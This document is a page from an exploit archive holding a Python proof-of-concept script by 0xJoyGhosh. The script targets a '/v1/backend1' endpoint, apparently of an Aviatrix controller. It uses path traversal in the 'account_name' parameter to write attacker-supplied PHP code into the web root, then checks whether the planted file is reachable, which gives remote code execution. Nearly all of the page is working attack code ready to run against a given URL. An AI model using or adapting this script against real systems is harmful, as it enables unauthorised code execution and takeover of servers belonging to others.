Share
## https://sploitus.com/exploit?id=1337DAY-ID-36888
#!/usr/bin/env python3
import requests
from requests.structures import CaseInsensitiveDict
from colorama import Fore, Style
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print(f"""
โโโโโ โโโโโโ โโโโโ โโ โโโ โโโโ โโโ โโโ โโ โโโโโ โโโโ โโโโ โโโโ โโโโ
โโโโโ โโโโโโ โโโโโ โโ โโโ โโโโ โโโ โโโ โโ โโโโโ โโโโ โโโโ โโโโ โโโโ
โโโโโ โโโโโโ โโโโโ โโ โโโ โโโโ โโโ โโโ โโ โโโโโ โโโโ โโโโ โโโโ โโโโ
Author : 0xJoyGhosh
Org : System00 Security
Twitter: @0xjoyghosh
""")
try:
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="Enter Target Url With scheme Ex: -u https://avaitix.target.com", type=str)
parser.add_argument("-c", "--code", help="Enter php code Ex: -c '<?php phpinfo(); ?>' ", type=str)
parser.add_argument("-n", "--name", help="Enter php code Ex: -n 'filename' ", type=str)
args = parser.parse_args()
url =f"{args.url}/v1/backend1"
except TypeError:
print("Type -h To See all the options")
except():
exit()
def exploit(url,path,code):
headers = CaseInsensitiveDict()
headers["Content-Type"] = "application/x-www-form-urlencoded"
data = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{path}.php&data={code}'
resp = requests.post(url, headers=headers, data=data,verify=False)
stat = requests.get(f"{args.url}/v1/{path}",verify=False)
if resp.status_code==200:
if stat.status_code==200:
print(f"[ {Fore.RED} Exploited {Fore.BLACK}] [{Fore.GREEN}{args.url}/v1/{path}{Fore.BLACK} ]")
print("")
else:
print("[ Exploit successful Creating File Failed ]")
pass
else:
print(f'[{Fore.BLUE} Exploit Unsuccessful {Fore.BLUE}]')
if args.url is not None:
if args.code is not None:
if args.name is not None:
exploit(url,args.name,args.code)
else:
print('Type -h to see help Menu')
else:
print('Type -h to see help Menu')
else:
print('Type -h to see help Menu')